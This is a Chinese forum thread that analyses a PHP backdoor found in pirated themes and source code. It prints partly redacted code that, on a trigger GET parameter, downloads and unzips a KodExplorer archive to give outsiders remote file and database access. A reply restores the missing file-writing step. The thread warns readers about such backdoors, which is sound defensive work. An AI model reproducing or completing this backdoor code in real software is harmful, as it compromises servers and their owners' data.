分析一段PHP的后门代码,很恶心
本帖最后由 xiaoma9624 于 2019-5-24 13:05 编辑给大家分析一个简单的可以自己发现的PHP后门代码,这段代码存在与好多破解主题与源码中,我自己就至少发现了四五种。包括本站有人分享的源码中,也有这种代码。具体自己看下吧!
由于上次发帖子违规,现在需要爱心值消除违规,在看完我的分析之后能不能给个热心呢?谢谢大家了。这个帖子应该没有违规吧!如有违规请告知。谢谢!
我再重申一遍,代码做了修改,为了防小人,大家知道代码原理就行了,非要自己弄到完整的要放到自己源码里坑人?还有这个代码不是可道云里面的。官方的可道云没有问题,没看明白的就再看一遍。不知道哪位热心的网友把帖子转到了QQ安全管家的论坛了,安全管家的工作人员已经和我要走了原始样本分析了,如果还有什么新的情况会在这里说明。
我分享代码是为了叫大家了解他的工作原理,提高警惕的。修改代码是不希望有的人直接拿去放到自己源码里面。因为有这种人,所以我修改了源码。所以不要再纠结这段代码能不能运行了!好不好!也希望大家有能力补全的自己留着就好,别发出来。
还是那句话,防小人,防小人,防小人
https://static.52pojie.cn/static/image/hrline/1.gifhttps://static.52pojie.cn/static/image/hrline/1.gif
正文开始
https://static.52pojie.cn/static/image/hrline/1.gifhttps://static.52pojie.cn/static/image/hrline/1.gif
先上代码
if($_GET['ac']=="ok"){ echo 'OK';
function downFile($url,$path){
$arr=parse_url($url);
$fileName=basename($arr['path']);
$file=file_get_contents($url);
}
downFile("这里是网络下载地址,防止小人,直接删除这里的连接");
class Unzip{
public function __construct(){
header("content-type:text/html;charset=utf8");
}
public function unzip($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true){
if ($zip = zip_open($src_file)){
if ($zip){
$splitter = ($create_zip_name_dir === true) ? "." : "/";
if($dest_dir === false){
}
$this->create_dirs($dest_dir);
while ($zip_entry = zip_read($zip)){
$pos_last_slash = strrpos(zip_entry_name($zip_entry), "/");
if ($pos_last_slash !== false){
$this->create_dirs($dest_dir.substr(zip_entry_name($zip_entry), 0, $pos_last_slash+1));
}
if (zip_entry_open($zip,$zip_entry,"r")){
$file_name = $dest_dir.zip_entry_name($zip_entry);
if ($overwrite === true || $overwrite === false && !is_file($file_name)){
$fstream = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
}
zip_entry_close($zip_entry);
}
}
zip_close($zip);
}
}else{
return false;
}
return true;
}
public function create_dirs($path){
if (!is_dir($path)){
$directory_path = "";
$directories = explode("/",$path);
array_pop($directories);
foreach($directories as $directory){
$directory_path .= $directory."/";
if (!is_dir($directory_path)){
mkdir($directory_path);
chmod($directory_path, 0777);
}
}
}
}
}
$z = new Unzip();
$z->unzip("kodexplorer4.39.zip",'./', true, false);
}
以上代码是我发现的后门里面最简单的也是最贱的一个代码,当收到GET请求ac=ok时。会自动的下载kodexplorer4.39.zip,对你没看错,就是这货可道云。知道可道云的自然是知道这个代码是怎么工作的了。不知道的我给大家简单的解释一下吧,可道云是一个私有云系统,运行在虚拟主机和服务器下。当下载解压完之后这货就成了你的服务器后门。别人可以通过可道云查看你的服务器内容。可以下载你服务器的文件,并且连接数据库修改数据。
是不是很简答?是不是很恶心?你杀毒都查不出这些东西!所以大家使用盗版的时候注意自己看下,中了招你都不知道怎么中的还以为是SQL注入修改的数据库。下面上图大家自己看一下吧。本地搭建的服务器写的代码测试的。大家有兴趣可以自己试试。
如果对你有用给个爱心啊,我要消除违规。还有奉劝那些知道后想做坏事的人啊,别干这么缺德的事。
由于怕有人拿走恶心人,代码修改了一部分,去掉了一些代码。想拿走给自己源码加后门的劝你们要点脸啊。 xiaoma9624 发表于 2019-5-22 21:22
没啥?你要自己验证代码么?
论坛里面是进行技术交流的。
贴了代码,也贴了分析说明。
代码贴和分析结论不一致,还没有任何说明,容易给其他学习者造成误导。
如果是隐藏了代码,在隐藏点写上备注说明,这样别人也不会被错误误导了。
为了便于大家交流讨论,我来尝试还原一下代码
function downFile($url,$path){
$arr=parse_url($url);
//这个地方是和url相关的,如果url不一样这个地方文件名获取的方式也不同
$fileName=basename($arr['path']);
$file=file_get_contents($url);
//数据写入文件
$fh = fopen($path . $fileName, 'wb');
fwrite($fh, $file);
fclose($fh);
}
downFile("这里是网络下载地址", "./" );
本站分享的哪些源码有这种后门?能透露一下让大家引起注意吗? 感谢楼主分享经验 真的很恶心的后门 看完的能不能给个热心值呢?热心值免费的!谢谢大家了 举报了吗?。包括本站有人分享的源码中,也有这种代码。 foxdog 发表于 2019-5-22 18:39
举报了吗?。
连接失效了就没管! xiaoma9624 发表于 2019-5-22 18:40
连接失效了就没管!
建议你说清楚,要不然感觉怪怪的 foxdog 发表于 2019-5-22 18:47
建议你说清楚,要不然感觉怪怪的
啥说清楚?代码都在上面呢还咋说清楚啊!{:1_904:} 感谢楼主分享